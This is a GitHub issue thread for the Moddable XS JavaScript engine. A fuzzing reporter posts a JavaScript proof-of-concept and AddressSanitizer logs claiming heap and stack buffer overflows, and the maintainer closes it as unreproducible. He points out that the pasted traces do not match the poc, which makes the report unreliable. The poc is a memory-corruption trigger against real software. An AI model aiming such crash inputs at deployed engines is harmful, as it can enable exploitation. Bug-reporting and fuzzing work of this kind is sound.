Moddable-OpenSource/moddable #635: heap-buffer-overflow(fx_RegExp_prototype_get_flags)

rain6851, 2021-05-02:
# enviroment 
  ubuntu 16.06
   compile with asan

# command
 ./xst poc

# poc
```
arr = []; 
Number.parseFloat("caller".concat("v1", "value", "-0", /./gimsuy.toString(), Number.prototype.toLocaleString.call("apply".search(/a+b+c/i))));

for (var i = 0; i < 100000; i++) arr[i] = []; 

arr.indexOf(new Object(), {
  valueOf: function () {
    arr.length = 0;
  }
});

```
# output
```
==73207==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f17028fe820 at pc 0x7f1705d9d904 bp 0x7ffe70930720 sp 0x7ffe7092fec8
WRITE of size 5 at 0x7f17028fe820 thread T0
    #0 0x7f1705d9d903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903)
    #1 0x61c2a8 in fx_String_prototype_pad /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:923
    #2 0x61c39e in fx_String_prototype_padEnd /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:943
    #3 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
    #4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #7 0x7f170544182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

0x7f17028fe820 is located 0 bytes to the right of 16777248-byte region [0x7f17018fe800,0x7f17028fe820)
allocated by thread T0 here:
    #0 0x7f1705da9602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
    #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
    #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
    #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
    #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
    #6 0x7f170544182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
  0x0fe360517cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe360517cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe360517cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe360517ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe360517cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe360517d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0fe360517d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe360517d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe360517d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe360517d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe360517d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==73207==ABORTING
root@ubuntu:~/AFL/targets/moddable/die_xst/die_xst_5# ../../xst 2
=================================================================
==73208==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc8b312d86 at pc 0x0000005ac6a6 bp 0x7ffc8b312d30 sp 0x7ffc8b312d20
WRITE of size 1 at 0x7ffc8b312d86 thread T0
    #0 0x5ac6a5 in fx_RegExp_prototype_get_flags /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRegExp.c:293
    #1 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
    #2 0x41d000 in fxGetAll /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:891
    #3 0x41d29f in fxGetID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:912
    #4 0x5ba3e1 in fx_RegExp_prototype_toString /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRegExp.c:1087
    #5 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
    #6 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #7 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #8 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #9 0x7f5c31ac782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #10 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

```

phoddie, 2021-05-03:
I'm not able to reproduce this issue, even with Address Sanitizer enabled, on macOS.

But, the report is a little confusing. At  the bottom, it shows a stack-buffer-overflow in `fx_RegExp_prototype_get_flags`. There was a an out-of-bounds write error in `fx_RegExp_prototype_get_flags` but that was fixed on November 3, 2020.

At the top, the report shows a bad write in `fx_String_prototype_pad`. However, in reading and running the test, it does not appear to invoke any string pad function.

What have a I missed?

phoddie, 2021-06-17:
@rain6851, are you still able to reproduce this problem?

phoddie, 2021-07-28:
Closing as we are unable to reproduce this. if it still occurs, please re-open.

closed 2021-07-28 by phoddie